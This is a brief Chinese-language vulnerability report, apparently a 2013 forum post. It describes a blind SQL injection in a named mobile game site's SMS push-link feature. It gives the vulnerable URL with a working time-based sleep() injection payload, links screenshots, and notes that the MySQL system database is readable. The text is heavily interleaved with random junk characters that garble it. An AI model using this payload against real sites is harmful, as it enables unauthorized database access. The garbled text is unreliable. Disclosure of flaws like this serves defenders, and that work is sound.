简要描述: o1 g7 R6 a( \, A1 {
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
F- e! F, o. k; z- ]; [: V. k: H5 Z/ g& {# [. `$ n! t }# ~
详细说明:6 e' E5 T+ m8 V( G: q
存在SQL盲注url:. P2 B. n; v. l; O0 h. S
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1 a; g- r* c0 g' h3 T
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
2 ~+ O3 J/ b: g; D- m' B) shttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png% E# l( v5 v3 @- a7 a2 O; A& U. J
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg* ]5 K8 M( h" W) [% G: t
6 u; k1 v% c: C! A' P# p# ?能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对